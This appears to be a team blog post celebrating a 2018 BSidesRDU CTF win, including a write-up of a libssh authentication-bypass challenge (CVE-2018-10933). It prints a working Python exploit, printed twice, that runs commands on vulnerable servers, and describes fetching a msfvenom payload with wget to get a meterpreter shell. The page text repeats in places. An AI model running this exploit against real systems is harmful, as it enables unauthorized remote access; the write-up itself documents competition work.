2018 BSidesRDU CTF
Winner! Winner!
Welcome Thrillhouse Group took first place at the 2018 BSidesRDU CTF by that was put on by Eversec CTF.
The team didn't really have time to put together any write-ups for this event. We were just too busy trying to overtake Ntropy the whole day.
However, I did make some mental notes on the challenge involving the libssh vulnerability CVE-2018-10933, and still have some spool files from using metasploit so I'll talk about that briefly.
Nmap scan report for 192.168.0.201
Host is up (0.00047s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.70%I=7%D=10/19%Time=5BCA2779%P=x86_64-pc-linux-gnu%r(NUL
SF:L,16,"SSH-2\.0-libssh_0\.8\.1\r\n");
MAC Address: 02:42:C0:A8:00:C9 (Unknown)
The next PoC script I found was on vulnhub's libssh repo for CVE-2018-10933
import sys
import paramiko
import socket
import logging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048
def execute(hostname, port, command):
sock = socket.socket()
try:
sock.connect((hostname, int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
client = transport.open_session(timeout=10)
client.exec_command(command)
# stdin = client.makefile("wb", bufsize)
stdout = client.makefile("rb", bufsize)
stderr = client.makefile_stderr("rb", bufsize)
output = stdout.read()
error = stderr.read()
stdout.close()
stderr.close()
return (output+error).decode()
except paramiko.SSHException as e:
logging.exception(e)
logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
except socket.error:
logging.debug("Unable to connect.")
return None
if __name__ == '__main__':
print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
This script worked like champ for this challenge.
I was able to test it by starting a python webserver: # python -m SimpleHTTPServer 8080
Then I used the script to have the target run a wget command to download "test" from my webserver. I saw the attempt and at that point I knew I had RCE.
Many thanks to the WTG members that were able to make it. We sat for a good 8 hours, ate food from a truck (though I don't think Rebecca ate at all!) ...and somehow we used up way more drink tickets than we were supposed to have.
I had a blast competing with you all by my side and I can't wait till we have an opportunity to do it again!
-strupo_
Welcome Thrillhouse Group took first place at the 2018 BSidesRDU CTF by that was put on by Eversec CTF.
BSidesRDU Final Score Board.
Team Ntropy was in the lead for most of the day and put up a really good fight, but WTG was able to pull ahead in the last few hours and hold first place till the end.
Our prize for taking first place was a copy of Clear and Present Danger by Tom Clancy:
Clear and Present Danger.
However this is no ordinary edition!
This copy contains what appears to be a silk-screened or possibly etched BSidesRDU 2018 flask.
BSidesRDU Flask.
However, I did make some mental notes on the challenge involving the libssh vulnerability CVE-2018-10933, and still have some spool files from using metasploit so I'll talk about that briefly.
[1] nmap indicated libssh
Host is up (0.00047s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.70%I=7%D=10/19%Time=5BCA2779%P=x86_64-pc-linux-gnu%r(NUL
SF:L,16,"SSH-2\.0-libssh_0\.8\.1\r\n");
MAC Address: 02:42:C0:A8:00:C9 (Unknown)
This was the only port open on this host. Normally, OpenSSH will clearly disclose exactly what's running and we can see libssh2.0 referenced in the last line, so I threw all of the PoCs at it hoping something would stick.
Here's how that went:
Here's how that went:
[2] use auxiliary/scanner/ssh/sshlib
The libssh metasploit module did not work at all.
msf auxiliary(scanner/ssh/sshlib) > options
Module options (auxiliary/scanner/ssh/sshlib):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.0.201 yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads
USERNAME root yes SSH username
msf auxiliary(scanner/ssh/sshlib) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[3] Blackbunny PoC
The next script I saw being passed around was from Blackbunny's github.
I first attempted the bypass script but that failed. I then fumbled with the fakekeyscript but in the end I got nowhere with either of these.
I first attempted the bypass script but that failed. I then fumbled with the fakekeyscript but in the end I got nowhere with either of these.
[4] vulnhub PoC FTW!
The next PoC script I found was on vulnhub's libssh repo for CVE-2018-10933
If you follow the link and scroll down a bit you will find this script:
#!/usr/bin/env python3import sys
import paramiko
import socket
import logging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048
def execute(hostname, port, command):
sock = socket.socket()
try:
sock.connect((hostname, int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
client = transport.open_session(timeout=10)
client.exec_command(command)
# stdin = client.makefile("wb", bufsize)
stdout = client.makefile("rb", bufsize)
stderr = client.makefile_stderr("rb", bufsize)
output = stdout.read()
error = stderr.read()
stdout.close()
stderr.close()
return (output+error).decode()
except paramiko.SSHException as e:
logging.exception(e)
logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
except socket.error:
logging.debug("Unable to connect.")
return None
if __name__ == '__main__':
print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
I was able to test it by starting a python webserver: # python -m SimpleHTTPServer 8080
Then I used the script to have the target run a wget command to download "test" from my webserver. I saw the attempt and at that point I knew I had RCE.
[5] Exploit
The steps to exploit were executed one at a time as my attempts to use multiple commands in a single line didn't play nice with the PoC script.
So I used msfvenom to create A.elf and used metasploit to run a handler for the incoming connection.
I then used the PoC script to wget A.elf from my system, then I used the script to make A.elf executable on the target system, and finally I used the script to run A.elf.
The result was a meterpreter session:
I then used the PoC script to wget A.elf from my system, then I used the script to make A.elf executable on the target system, and finally I used the script to run A.elf.
The result was a meterpreter session:
Meterpreter Session.
At this point it was a simple matter of finding the flag, which if I remember correctly was in /root/flag.txt.
There are a ton of PoCs for this vuln out there now, here's another that I have saved but never got around to testing: https://github.com/SoledaD208/CVE-2018-10933
There are a ton of PoCs for this vuln out there now, here's another that I have saved but never got around to testing: https://github.com/SoledaD208/CVE-2018-10933
Wrap-Up
For those that are interested, here are all of our solves:
Challenge Title | Challenge Points | Solves |
droop basic | 700 | 2 |
nothing.png | 500 | 7 |
rc4js | 475 | 5 |
hello droop | 450 | 3 |
maldoc4 | 420 | 5 |
salesman.jpeg | 400 | 10 |
libs | 385 | 4 |
silky.tar | 375 | 9 |
ez.tar | 350 | 4 |
seequi | 320 | 4 |
zip | 300 | 3 |
wrblr.jar | 285 | 5 |
2.txt | 240 | 2 |
api | 220 | 3 |
trivia 5 | 200 | 9 |
ftp | 190 | 17 |
dir | 175 | 9 |
yum | 155 | 3 |
1.txt | 150 | 5 |
droop3 | 150 | 5 |
base | 140 | 9 |
strange_numbers.txt | 120 | 18 |
osint 1 | 100 | 2 |
maldoc1 | 75 | 6 |
trivia 3 | 50 | 13 |
trivia 4 | 50 | 16 |
password | 25 | 30 |
trivia 2 | 25 | 11 |
trivia 1 | 25 | 20 |
maldoc2 | 25 | 3 |
Free Twitter Flag | 15 | 15 |
donut | 5 | 1 |
Many thanks to the WTG members that were able to make it. We sat for a good 8 hours, ate food from a truck (though I don't think Rebecca ate at all!) ...and somehow we used up way more drink tickets than we were supposed to have.
I had a blast competing with you all by my side and I can't wait till we have an opportunity to do it again!
-strupo_